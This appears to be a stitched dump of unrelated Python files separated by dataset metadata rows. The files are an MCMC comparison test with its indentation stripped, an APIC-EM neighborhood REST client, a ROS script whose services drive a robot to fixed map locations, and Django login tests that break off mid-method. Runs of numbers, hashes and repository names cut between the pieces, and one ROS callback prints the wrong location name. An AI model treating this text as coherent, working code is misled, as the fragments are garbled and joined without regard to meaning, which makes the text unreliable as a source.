mcmc_time_mat = matlab_output['mcmc_time']
mcmc_mat = matlab_output['mcmc']
mcmc_mat = {k: np.array(mcmc_mat[k]) for k in mcmc_mat.keys()}
# do python sampling
np.random.seed(int(seed))
t_start = time()
model.do_mcmc(n_mcmc)
t_end = time()
print('Python mcmc time %0.3g s' % (t_end - t_start), flush=True)
print('Matlab mcmc time %0.3g s' % mcmc_time_mat, flush=True)
samples_dict = {p.name: p.mcmc_to_array() for p in model.params.mcmcList}
samples_dict['logPost'] = np.array(model.params.lp.mcmc.draws).reshape((-1, 1))
self.assertTrue(set(samples_dict.keys()) == set(mcmc_mat.keys()))
if show_figs:
import matplotlib.pyplot as plt
for i, k in enumerate(samples_dict.keys()):
param_shape = samples_dict[k].shape[1]
if param_shape >= 5:
ncol = 5
nrow = int(np.ceil(param_shape / ncol))
else:
ncol = param_shape
nrow = 1
plt.figure(i)
for j in range(param_shape):
plt.subplot(nrow, ncol, j + 1)
plt.hist(samples_dict[k][:, j], alpha=0.5)
plt.hist(mcmc_mat[k][:, j], alpha=0.5)
plt.xlabel(k)
plt.legend(['python', 'matlab'])
plt.show()
for k in samples_dict.keys():
self.assertTrue(np.allclose(np.mean(samples_dict[k], 0), np.mean(mcmc_mat[k], 0)))
self.assertTrue(np.allclose(np.std(samples_dict[k], 0), np.std(mcmc_mat[k], 0)))
def test_mcmc_multi_sim_and_obs_noD(self):
print('starting test_mcmc_multi_sim_and_obs_noD', flush=True)
show_figs = True
seed = 42.
n_mcmc = 20
m = 200
n = 20
nt_sim = 75
nt_obs = 50
n_pc = 5 # must be smaller than nt
nx = 3
noise_sd = 0.1
model, matlab_output = setup_multi_sim_and_obs_noD(m=m, n=n, nt_sim=nt_sim, nt_obs=nt_obs, noise_sd=noise_sd,
nx=nx, n_pc=n_pc, seed=seed, n_lik=0, n_mcmc=n_mcmc)
mcmc_time_mat = matlab_output['mcmc_time']
mcmc_mat = matlab_output['mcmc']
mcmc_mat = {k: np.array(mcmc_mat[k]) for k in mcmc_mat.keys()}
# do python sampling
np.random.seed(int(seed))
t_start = time()
model.do_mcmc(n_mcmc)
t_end = time()
print('Python mcmc time %0.3g s' % (t_end - t_start), flush=True)
print('Matlab mcmc time %0.3g s' % mcmc_time_mat, flush=True)
samples_dict = {p.name: p.mcmc_to_array() for p in model.params.mcmcList}
samples_dict['logPost'] = np.array(model.params.lp.mcmc.draws).reshape((-1, 1))
self.assertTrue(set(samples_dict.keys()) == set(mcmc_mat.keys()))
if show_figs:
import matplotlib.pyplot as plt
for i, k in enumerate(samples_dict.keys()):
param_shape = samples_dict[k].shape[1]
if param_shape >= 5:
ncol = 5
nrow = int(np.ceil(param_shape / ncol))
else:
ncol = param_shape
nrow = 1
plt.figure(i)
for j in range(param_shape):
plt.subplot(nrow, ncol, j + 1)
plt.hist(samples_dict[k][:, j], alpha=0.5)
plt.hist(mcmc_mat[k][:, j], alpha=0.5)
plt.xlabel(k)
plt.legend(['python', 'matlab'])
plt.show()
for k in samples_dict.keys():
self.assertTrue(np.allclose(np.mean(samples_dict[k], 0), np.mean(mcmc_mat[k], 0)))
self.assertTrue(np.allclose(np.std(samples_dict[k], 0), np.std(mcmc_mat[k], 0)))
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(SepiaMCMCTestCase)
unittest.TextTestRunner(verbosity=2).run(suite)
| 37.15035
| 117
| 0.553976
| 1,519
| 10,625
| 3.666228
| 0.098091
| 0.088885
| 0.035913
| 0.034117
| 0.906446
| 0.903214
| 0.883821
| 0.862453
| 0.856348
| 0.840546
| 0
| 0.02176
| 0.320941
| 10,625
| 286
| 118
| 37.15035
| 0.750104
| 0.028612
| 0
| 0.850467
| 0
| 0
| 0.057696
| 0.012942
| 0
| 0
| 0
| 0
| 0.070093
| 1
| 0.023364
| false
| 0
| 0.042056
| 0
| 0.070093
| 0.070093
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f004bc335bbb5d07fa172b2362fbbaa1cf3e432c
| 8,005
|
py
|
Python
|
apis/nb/clients/identity_manager_client/V2NeighborhoodApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts-
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 45
|
2016-06-09T15:41:25.000Z
|
2019-08-06T17:13:11.000Z
|
apis/nb/clients/identity_manager_client/V2NeighborhoodApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 36
|
2016-06-12T03:03:56.000Z
|
2017-03-13T18:20:11.000Z
|
apis/nb/clients/identity_manager_client/V2NeighborhoodApi.py
|
CiscoDevNet/APIC-EM-Generic-Scripts
|
74211d9488f1e77cf56ef86dba20ec8e8eb49cc1
|
[
"ECL-2.0",
"Apache-2.0"
] | 15
|
2016-06-22T03:51:37.000Z
|
2019-07-10T10:06:02.000Z
|
#!/usr/bin/env python
#pylint: skip-file
# This source code is licensed under the Apache license found in the
# LICENSE file in the root directory of this project.
import sys
import os
import urllib.request, urllib.parse, urllib.error
from .models import *
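# Generated-style client for the /v2/neighborhood endpoints: every method
# rejects unexpected keyword arguments, fills in path/body parameters, calls
# self.apiClient.callAPI, and deserializes the response into a model object.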
class V2NeighborhoodApi(object):
def __init__(self, apiClient):
self.apiClient = apiClient
def getAllNeighbors(self, **kwargs):
"""Lists all neighborhood
Args:
Returns: NeighborhoodListResult
"""
allParams = []
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getAllNeighbors" % key)
params[key] = val
del params['kwargs']
resourcePath = '/v2/neighborhood'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'NeighborhoodListResult')
return responseObject
def updateNeighbor(self, **kwargs):
"""Update Neighbor(s)
Args:
nbr, NeighborhoodDTO: Neighborhood Object (required)
Returns: TaskIdResult
"""
allParams = ['nbr']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method updateNeighbor" % key)
params[key] = val
del params['kwargs']
resourcePath = '/v2/neighborhood'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'PUT'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('nbr' in params):
bodyParam = params['nbr']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def addNeighbor(self, **kwargs):
"""Create Neighbor(s)
Args:
nbr, NeighborhoodDTO: Neighborhood Object (required)
Returns: TaskIdResult
"""
allParams = ['nbr']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method addNeighbor" % key)
params[key] = val
del params['kwargs']
resourcePath = '/v2/neighborhood'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'POST'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('nbr' in params):
bodyParam = params['nbr']
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
def getNeighbor(self, **kwargs):
"""List a neighborhood
Args:
id, str: Retrieve Neighborhood for a given UUID (required)
Returns: NeighborhoodResult
"""
allParams = ['id']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method getNeighbor" % key)
params[key] = val
del params['kwargs']
resourcePath = '/v2/neighborhood/{id}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'GET'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('id' in params):
replacement = str(self.apiClient.toPathValue(params['id']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'id' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'NeighborhoodResult')
return responseObject
def deleteNeighbor(self, **kwargs):
"""Delete neighborhood
Args:
id, str: Delete Neighborhood for a given UUID (required)
Returns: TaskIdResult
"""
allParams = ['id']
params = locals()
for (key, val) in list(params['kwargs'].items()):
if key not in allParams:
raise TypeError("Got an unexpected keyword argument '%s' to method deleteNeighbor" % key)
params[key] = val
del params['kwargs']
resourcePath = '/v2/neighborhood/{id}'
resourcePath = resourcePath.replace('{format}', 'json')
method = 'DELETE'
queryParams = {}
headerParams = {}
formParams = {}
files = {}
bodyParam = None
headerParams['Accept'] = 'application/json'
headerParams['Content-Type'] = 'application/json'
if ('id' in params):
replacement = str(self.apiClient.toPathValue(params['id']))
replacement = urllib.parse.quote(replacement)
resourcePath = resourcePath.replace('{' + 'id' + '}',
replacement)
postData = (formParams if formParams else bodyParam)
response = self.apiClient.callAPI(resourcePath, method, queryParams,
postData, headerParams, files=files)
if not response:
return None
responseObject = self.apiClient.deserialize(response, 'TaskIdResult')
return responseObject
| 24.039039
| 106
| 0.51955
| 636
| 8,005
| 6.533019
| 0.179245
| 0.043803
| 0.052226
| 0.021661
| 0.825993
| 0.825993
| 0.825993
| 0.806739
| 0.806739
| 0.806739
| 0
| 0.00122
| 0.385759
| 8,005
| 332
| 107
| 24.111446
| 0.843807
| 0.090693
| 0
| 0.842466
| 0
| 0
| 0.130704
| 0.009213
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041096
| false
| 0
| 0.027397
| 0
| 0.143836
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f005e96d49c91a76ad86a21f78daf39121166101
| 76
|
py
|
Python
|
src/bug.py
|
pombredanne/setuptools-782
|
f4fc07001170344557bfa34361a5879a97156163
|
[
"Apache-2.0"
] | null | null | null |
src/bug.py
|
pombredanne/setuptools-782
|
f4fc07001170344557bfa34361a5879a97156163
|
[
"Apache-2.0"
] | null | null | null |
src/bug.py
|
pombredanne/setuptools-782
|
f4fc07001170344557bfa34361a5879a97156163
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
def run():
print('hello world')
| 12.666667
| 37
| 0.723684
| 10
| 76
| 5
| 0.9
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.184211
| 76
| 5
| 38
| 15.2
| 0.806452
| 0
| 0
| 0
| 0
| 0
| 0.146667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
f0179d67d26cd27e428edc291916423e2a44dc58
| 15,074
|
py
|
Python
|
src/armadillo_navigation/scripts/navigation_services_for_simulation.py
|
aosbgu/ROSPlan-ExperimentPDDL
|
09de0ba980362606dd1269c6689cb59d6f8776c6
|
[
"MIT"
] | null | null | null |
src/armadillo_navigation/scripts/navigation_services_for_simulation.py
|
aosbgu/ROSPlan-ExperimentPDDL
|
09de0ba980362606dd1269c6689cb59d6f8776c6
|
[
"MIT"
] | null | null | null |
src/armadillo_navigation/scripts/navigation_services_for_simulation.py
|
aosbgu/ROSPlan-ExperimentPDDL
|
09de0ba980362606dd1269c6689cb59d6f8776c6
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import rospy
import time
import tf
import actionlib
from actionlib_msgs.msg import GoalStatus
from move_base_msgs.msg import MoveBaseAction, MoveBaseGoal
from geometry_msgs.msg import Point
from armadillo_navigation.srv import ser_message, ser_messageResponse
import os, time, signal, threading
import subprocess
from subprocess import Popen, PIPE, call
rospy.init_node('navigation_services')
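# Each _callback_navigate_* handler below sends a fixed map-frame MoveBaseGoal
# to the move_base action server, waits up to 60 seconds for a result, and
# answers the ser_message service with the outcome.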
def planning_cobra_center():
#End#################################################################################################
print('Planning to cobra-center!\n')
time.sleep(1)
proc = subprocess.Popen(["roslaunch robotican_demos_upgrade cobra_center.launch"], stdout=PIPE, stderr=PIPE, shell=True, universal_newlines=True)
while True:
lin = proc.stdout.readline()
if "success" in lin and "True" in lin:
break
elif "success" in lin and "False" in lin:
break
else:
continue
proc.terminate()
return
def _callback_navigate_corner_area(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(1.350, 4.495, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, -1.552)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the open area")
time.sleep(1)
return ser_messageResponse(True)  # rospy service callbacks must return the response object
else:
print("The robot failed to reach the open area")
time.sleep(1)
return ser_messageResponse(False)
def _callback_navigate_open_area(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(5.719, -3.375, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, -1.501)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the open area")
time.sleep(1)
return ser_messageResponse(True)
else:
print("The robot failed to reach the open area")
time.sleep(1)
return ser_messageResponse(False)
def _callback_navigate_elevator(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(7.650, 3.676, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, 1.650)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
time.sleep(4)
##repeated just to adjust the location, important for push button
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(7.191, 4.220, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, 1.604)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the elevator")
time.sleep(1)
return ser_messageResponse(True)
else:
print("The robot failed to reach the elevator")
time.sleep(1)
return ser_messageResponse(False)
def _callback_navigate_auditorium(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(10.020, -0.656, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, -1.519)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the auditorium")
time.sleep(1)
return ser_messageResponse(True)
else:
print("The robot failed to reach the auditorium")
time.sleep(1)
return ser_messageResponse(False)
def _callback_navigate_lab_211(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(0.356, 0.603, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, 0.224)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the lab211")
time.sleep(1)
return ser_messageResponse(True)
else:
print("The robot failed to reach the lab211")
time.sleep(1)
return ser_messageResponse(False)
def _callback_navigate_outside_lab211(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(-3.133, 3.741, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, -3.099)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
time.sleep(2)
#repeat just for solid execution
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(-4.352, 4.006, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, -2.884)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the outside of lab211")
time.sleep(1)
return ser_messageResponse(True)
else:
print("The robot failed to reach the outside of lab211")
time.sleep(1)
return ser_messageResponse(False)
def _callback_navigate_corridor(req):
# define a client to send goal requests to the move_base server through a SimpleActionClient
ac = actionlib.SimpleActionClient("move_base", MoveBaseAction)
# wait for the action server to come up
while(not ac.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.logwarn("Waiting for the move_base action server to come up")
'''while(not ac_gaz.wait_for_server(rospy.Duration.from_sec(5.0))):
rospy.loginfo("Waiting for the move_base_simple action server to come up")'''
goal = MoveBaseGoal()
#set up the frame parameters
goal.target_pose.header.frame_id = "/map"
goal.target_pose.header.stamp = rospy.Time.now()
# moving towards the goal*/
goal.target_pose.pose.position = Point(8.659, 3.203, 0)
orientation = tf.transformations.quaternion_from_euler(0, 0, 0.008)
goal.target_pose.pose.orientation.x = orientation[0]
goal.target_pose.pose.orientation.y = orientation[1]
goal.target_pose.pose.orientation.z = orientation[2]
goal.target_pose.pose.orientation.w = orientation[3]
rospy.loginfo("Sending goal location ...")
ac.send_goal(goal)
ac.wait_for_result(rospy.Duration(60))
if(ac.get_state() == GoalStatus.SUCCEEDED):
print("You have reached the corridor")
time.sleep(1)
return ser_messageResponse(True)
else:
print("The robot failed to reach the corridor")
time.sleep(1)
return ser_messageResponse(False)
#it must be in cobra-center position before starting navigation
planning_cobra_center()
rospy.Service("/elevator_go", ser_message, _callback_navigate_elevator)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/auditorium_go", ser_message, _callback_navigate_auditorium)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/lab_211_go", ser_message, _callback_navigate_lab_211)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/corridor_go", ser_message, _callback_navigate_corridor)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/outside_lab_211_go", ser_message, _callback_navigate_outside_lab211)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/open_area", ser_message, _callback_navigate_open_area)
rospy.loginfo("navigation service is waiting for request...")
rospy.Service("/corner_area", ser_message, _callback_navigate_corner_area)
rospy.loginfo("navigation service is waiting for request...")
rospy.spin()
| 42.823864
| 151
| 0.710694
| 2,127
| 15,074
| 4.881523
| 0.092149
| 0.060676
| 0.084947
| 0.078012
| 0.890109
| 0.87624
| 0.871328
| 0.864779
| 0.864779
| 0.845131
| 0
| 0.021972
| 0.175733
| 15,074
| 351
| 152
| 42.945869
| 0.813682
| 0.120539
| 0
| 0.719008
| 0
| 0
| 0.153564
| 0.001959
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033058
| false
| 0
| 0.045455
| 0
| 0.082645
| 0.061983
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b2f9fc3a1419efd892b2177e374dd53765880698
| 91,041
|
py
|
Python
|
authentication_service/tests/test_views.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 1
|
2018-03-15T12:49:05.000Z
|
2018-03-15T12:49:05.000Z
|
authentication_service/tests/test_views.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 215
|
2017-12-07T09:11:52.000Z
|
2022-03-11T23:19:59.000Z
|
authentication_service/tests/test_views.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T12:05:32.000Z
|
2021-08-17T12:05:32.000Z
|
import datetime
import random
import uuid
from unittest import mock
from django.conf import settings
from django.contrib import auth
from django.contrib.auth import get_user_model, login
from django.contrib.auth import hashers
from django.contrib.messages import get_messages
from django.core import signing
from django.core.urlresolvers import reverse
from django.test import TestCase, override_settings
from django.utils import timezone
from django_otp.plugins.otp_totp.models import TOTPDevice
from django_otp.util import random_hex
from oidc_provider.models import Client
from unittest.mock import patch, MagicMock
from defender.utils import unblock_username
from access_control import Invitation, InvitationRedirectUrl
from authentication_service import constants
from django.contrib.auth.hashers import check_password, make_password
from authentication_service.models import (
SecurityQuestion,
UserSecurityQuestion,
Organisation
)
from authentication_service.user_migration.models import (
TemporaryMigrationUserStore
)
class LoginHelper(object):
"""
Test urls can be handled a bit better, however this was the fastest way
to refactor the existing tests.
"""
# Wizard helper methods
def do_login(self, data):
return self.client.post(
f"{reverse('login')}?next=/openid/authorize/"
f"%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id"
f"%3Dmigration_client_id%26redirect_uri%3Dhttp%3A%2F%2F"
f"example.com%2F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO",
data=data,
follow=True
)
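    # the percent-encoded "next" above decodes to:
    # /openid/authorize/?response_type=code&scope=openid
    #     &client_id=migration_client_id&redirect_uri=http://example.com/
    #     &state=3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO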
class TestLogin(TestCase):
@classmethod
def setUpTestData(cls):
super(TestLogin, cls).setUpTestData()
cls.user = get_user_model().objects.create_user(
username="inactiveuser1",
email="inactive@email.com",
password="Qwer!234",
birth_date=datetime.date(2001, 1, 1)
)
cls.user.is_active = False
cls.user.save()
cls.client = Client.objects.create(
client_id="migration_client_id",
name= "MigrationCLient",
client_secret= "super_client_secret_1",
response_type= "code",
jwt_alg= "HS256",
redirect_uris= ["http://example.com/"]
)
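        # note: this class attribute is shadowed in every test, since Django's
        # TestCase assigns a fresh HTTP test client to self.client before each
        # test runs; the OIDC Client created here is still persisted for the class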
def test_logged_in_user(self):
url = reverse('login')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
        # force login a user; they should now be redirected away from the login page
self.client.force_login(self.user)
res = self.client.get(url)
self.assertRedirects(res, reverse('edit_profile'))
def test_inactive_user_login(self):
data = {
"login_view-current_step": "auth",
"auth-username": "inactiveuser1",
"auth-password": "Qwer!234"
}
response = self.client.post(
reverse("login"),
data=data,
follow=True
)
self.assertContains(response, "Your account has been deactivated. Please contact support.")
    # patch the django-defender util below to always return True
    # (the function takes 3 args: request, login_unsuccessful, get_username)
@patch("defender.utils.check_request", new=lambda a, b, c: True)
def test_invalid_user_login(self):
user = get_user_model().objects.create_user(
username="testusername",
email="testusername@email.com",
password="Qwer!234",
birth_date=datetime.date(2001, 1, 1)
)
data = {
"login_view-current_step": "auth",
"auth-username": user.username,
"auth-password": "wrongpassword"
}
response = self.client.post(reverse("login"), data=data, follow=True)
self.assertEquals(response.context['form'].errors, {
'__all__': [
"Hmmm this doesn't look right. "
"Check that you've entered your username and password correctly and try again!"
]
})
def test_invalid_user_creds(self):
data = {
"login_view-current_step": "auth",
"auth-username": "",
"auth-password": ""
}
